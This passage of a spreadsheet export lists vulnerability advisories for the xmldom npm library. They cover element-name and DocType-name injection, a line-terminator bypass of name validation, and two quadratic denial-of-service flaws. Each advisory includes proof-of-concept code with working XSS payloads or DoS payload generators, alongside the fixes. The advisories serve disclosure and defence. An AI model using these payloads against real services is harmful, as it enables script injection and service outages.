Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:
- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.
`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.
Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.
### PoC — fixed path
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```
### Why the default stays verbatim
The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.
Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t>
        </is>
      </c>
      <c r="T1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83608</t>
        </is>
      </c>
      <c r="D1056" s="5" t="inlineStr"/>
      <c r="E1056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1056" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1056" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1056" s="5" t="inlineStr"/>
      <c r="R1056" s="5" t="inlineStr"/>
      <c r="S1056" s="5" t="inlineStr">
        <is>
          <t>## Summary
The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.
Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.
## Details
The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:
- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.
### Enabling write paths
`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:
- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.
This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.
### Root Cause
1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.
## Proof of Concept
Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):
```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const serializer = new XMLSerializer();
// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);
const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```
Confirmed runtime behavior:
- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.
A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.
## Impact
Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:
- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.
## Fix Applied
Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);
// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```
### Why the default stays verbatim
W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.
### Residual limitation
The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t>
        </is>
      </c>
      <c r="T1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83609</t>
        </is>
      </c>
      <c r="D1057" s="5" t="inlineStr"/>
      <c r="E1057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1057" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1057" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1057" s="5" t="inlineStr"/>
      <c r="R1057" s="5" t="inlineStr"/>
      <c r="S1057" s="5" t="inlineStr">
        <is>
          <t>## Summary
An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.
## Details
`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).
### Root Cause
1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.
The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);
// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```
## Impact
- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.
## Fix Applied
`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t>
        </is>
      </c>
      <c r="T1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83612</t>
        </is>
      </c>
      <c r="D1058" s="5" t="inlineStr"/>
      <c r="E1058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1058" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr"/>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1058" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1058" s="5" t="inlineStr"/>
      <c r="R1058" s="5" t="inlineStr"/>
      <c r="S1058" s="5" t="inlineStr">
        <is>
          <t>## Summary
In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.
## Details
The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.
### Root Cause
1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.
## Affected Versions
Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.
## Proof of Concept
```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```
Output size grows quadratically with the number of case-mismatched raw-text elements:
```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```
Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.
## Impact
Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.
The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.
## Severity note
The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.
## Fix Applied
The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t>
        </is>
      </c>
      <c r="T1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83613</t>
        </is>
      </c>
      <c r="D1059" s="5" t="inlineStr"/>
      <c r="E1059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1059" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1059" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1059" s="5" t="inlineStr"/>
      <c r="R1059" s="5" t="inlineStr"/>
      <c r="S1059" s="5" t="inlineStr">
        <is>
          <t>## Summary
xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.
Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.
This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.
## Details
The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:
```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```
https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387
`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:
```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```
https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623
`getNamedItemNS` walks the whole list on every call:
```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```
https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715
For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.
The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:
- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308
The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.
## Proof of Concept
A single well-formed element with `M` distinct attributes. No malformed markup and no options:
```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;
function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}
for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```
Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):
**`@xmldom/xmldom` 0.9.10:**
| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |
**`@xmldom/xmldom` 0.8.13:**
| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |
**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).
Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.
## Impact
Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.
## Fix Applied
Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t>
        </is>
      </c>
      <c r="T1059" s="6" t="inlineStr">
        <is>
